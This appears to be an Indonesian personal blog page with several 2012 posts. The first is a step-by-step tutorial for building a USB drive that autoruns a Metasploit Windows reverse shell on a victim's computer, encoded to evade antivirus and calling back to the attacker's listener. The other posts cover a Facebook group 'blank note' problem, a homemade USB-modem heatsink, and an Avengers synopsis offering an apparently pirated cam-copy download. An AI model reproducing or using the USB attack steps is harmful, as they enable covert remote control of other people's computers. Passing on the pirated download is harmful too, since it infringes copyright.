8.17.2012

U3 UFD Pawned

 Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

 Requirement    :
  • UFD yang mendukung U3, ex: UFD bermerk Sandisk, Kingston (tipe lama)...
  • Linux yg memiliki Metasploit (ex: Backtrack)
  • U3 Tool (ada di repo Backtrack)
  • U3 Pwn.tar.gz (http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz)

The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda
apt-get install u3-tool

- Download U3 Pwn.tar.gz
wget http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz
wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz
cd  /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image
Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan
   Enter number: 1


- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.
Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP
ex: dalam kasus ini saya menggunakan backtrack sebagai host  yang mendapatkan ip  192.168.56.101 sedangkan korban memiliki IP 192.168.56.1
 Enter Ip Address for reverse listener: 192.168.56.101

 Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1
   Enter the device to change iso image on (example /dev/sde1): /dev/sdb1

                                                                             
          ~    .__ °.__   0       o                    ^   .__ °__  `´       
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__. 
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  | 
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O| 
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____| 
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´ 

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


  Generating Shellcode Please Wait...
|**************************************************| 100%
OK


- Pilih yes untuk menjalan exploit handler
Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...:))


related link:
http://packetstormsecurity.org/files/114502/U3-Pwn-Sandisk-Executable-Injection-Tool.html

7.24.2012

Ur Group Still Blank!!! take a look this table

7.23.2012

Long Life My USB Modem

Bila di tanya berapa lama anda menggunkan internet dalam sehari, maka jawaban 1 jam mungkin adalah jawaban yang amat sangat langka saat ini. Di limpahi berbagai kemudahan, mulai dari harga komputer atau notebook yang relatif murah hingga modem portable dengan jaringan 3G yang cukup mumpuni untuk melakukan berbagai kegiatan.

Namun seperti peralatan elektronik lainnya notebook dan usb modem juga akan mengalami perlambanan kinerja jika dalam satu sesi di pakai dalam waktu yang lama dan untuk kerja yang berat. Panas yang dipicu oleh durasi yang berlebihan tak jarang mengakibat kerusakan fisik komponen.
Postingan kali ini saya bakal kasih penampakan modem yang biasa saya gunakan...mudah-mudahan bisa memberi inspirasi buat oprek2 modem anda...

Spoiler
 Tampilan setengah jadi sebelum dipasangi external antenna

Part bekas heatsink power supply buat jadi docking (dudukan)
heatsink bekas processor PI

setelah di potong menjadi dua bagian
kawat tembaga untuk menjepit modem dengan bagian heatsink

Tampilan jadi yang sudah menggunakan eksternal antenna


nb: cara membuat sendiri pigtail external antenna bisa di temukan disini 

7.15.2012

penanganan blank facebook group (video tutorial)

Beberapa waktu yang lalu, dibeberapa group facebook merebak sebuah fenomena baru yakni kosongnya halaman group. Posting status hingga komentar dari member ataupun admin dr group tersebut. Merujuk pada salah satu group yang saya ikuti masalah ini terjadi lantaran adanya malicious code dalam note fb (note blank) yg dishare atau di post dalam komentar di dalam group.Setelah melakukan googling dan searching, akhirnya ditemukan cara-cara yang bisa digunakan untuk mengatasinya.

ada bebrapa catatan yg patut diperhatikan sebelum mengikuti tutorial ini:
  • Serangan yg dilakukan dalam tutorial ini dilakukan pada group yg saya buat sendiri (bukan ke group lain).
  • Link url note fb yg digunakan bukan milik saya dan mungkin saja saat ini sudah dihapus oleh pemilikna. 
  • Penghapusan posting yang bersifat "status" yg bermasalah hanya dapat dilakukan admin group, sedangkan penghapusan komentar yang mengandung url note blank bisa di hapus oleh pengomentar sendiri (tidak harus admin)
  • di dalam "test blank" group dlm video di bawah yg menjadi penyerang sekaligus admin group adalah blogger sendiri.



thanks to: Balikita Forum (andre pangestu, wi, al kahfi dkk), Hacker Community (Mulyana sandi, Pak de agus purnomo, bli Putu Shinoda dkk), X-calibur (rastri, dkk)

related post: Ur Group Still Blank!!! take a look this table

5.14.2012

The Avengers (2012 film) cam ver.2

Directed by :     Joss Whedon
Produced by :     Kevin Feige
Story by :  Zak Penn, Joss Whedon
Starring : RobertDowney,Jr, Chris Evans, Mark Ruffalo, Chris Hemsworth, Scarlett Johansson, Jeremy Renner, Tom Hiddleston, Clark Gregg, Cobie Smulders, Stellan SkarsgÄrd, Samuel L. Jackson

The plots:
The Asgardian Loki encounters the Other, the leader of a warmongering alien race known as the Chitauri. In exchange for retrieving the Tesseract,2 a powerful energy source of unknown potential, the Other promises Loki a Chitauri army with which he can subjugate the Earth. Nick Fury, director of the espionage agency S.H.I.E.L.D., and his lieutenant Agent Maria Hill arrive at a remote research facility during an evacuation, where physicist Dr. Erik Selvig is leading a research team experimenting on the Tesseract. Agent Phil Coulson explains that the object has begun radiating an unusual form of energy. The Tesseract suddenly activates and opens a portal, allowing Loki to reach Earth. Loki takes the Tesseract and uses his scepter to enslave Selvig and several agents, including Clint Barton, to aid him in his getaway.

In response to the attack, Fury reactivates the "Avengers Initiative". Agent Natasha Romanoff is sent to India to recruit Dr. Bruce Banner; Coulson visits Tony Stark to have him review Selvig's research; and Fury approaches Steve Rogers with an assignment to retrieve the Tesseract. While Barton steals iridium needed to stabilize the Tesseract's power, Loki causes a distraction in Stuttgart, Germany, leading to a confrontation with Rogers, Stark, and Romanoff that ends with Loki's surrender. While Loki is being escorted to S.H.I.E.L.D., Thor, his adoptive brother, arrives and frees him hoping to convince him to abandon his plan and return to Asgard. After a confrontation with Stark and Rogers, Thor agrees to take Loki to S.H.I.E.L.D.'s flying aircraft carrier, the Helicarrier. There Loki is imprisoned while Banner and Stark attempt to locate the Tesseract.

The Avengers become divided, both over how to approach Loki and the revelation that S.H.I.E.L.D. plans to harness the Tesseract to develop weapons as a deterrent against hostile extra-terrestrials. As the group argues, Barton, and Loki's other possessed agents, attack the Helicarrier, disabling its engines in flight and causing Banner to transform into the Hulk. Stark and Rogers try to restart the damaged engines, and Thor attempts to stop the Hulk's rampage. Romanoff fights Barton, and knocks him unconscious, breaking Loki's mind control. Loki escapes after killing Coulson and ejecting Thor from the airship, while the Hulk leaves of his own accord. Fury uses Coulson's death to motivate the Avengers into working as a team. Stark and Rogers realize that simply defeating them will not be enough for Loki; he needs to overpower them publicly to validate himself as ruler of Earth. Loki uses the Tesseract, in conjunction with a device Selvig built, to open a portal above Stark Tower to the Chitauri fleet in space, launching his invasion.

The Avengers rally in defense of New York City, but quickly realize they will be overwhelmed as wave after wave of Chitauri descend upon Earth. With help from Barton, Rogers, Stark, and Thor evacuate civilians, while Banner transforms back into the Hulk and goes after Loki, eventually beating him into submission. Romanoff makes her way to the portal, where Selvig, freed of Loki's control, reveals that Loki's scepter can be used to close the portal. Meanwhile, Fury's superiors attempt to end the invasion by launching a nuclear missile at Manhattan. Stark intercepts the missile and takes it through the portal toward the Chitauri fleet. The missile detonates, destroying the invaders' lead ship, thereby disabling their forces on Earth. Stark's suit runs out of power and he falls back through the portal, but the Hulk saves him from crashing to the ground. Romanoff deactivates the portal to prevent further invasion. In the aftermath, Thor returns Loki and the Tesseract to Asgard. Fury notes that the Avengers will return when they are needed.


Thumbnail:
download:

password: sinema-21.com

Twitter Delicious Facebook Digg Stumbleupon Favorites More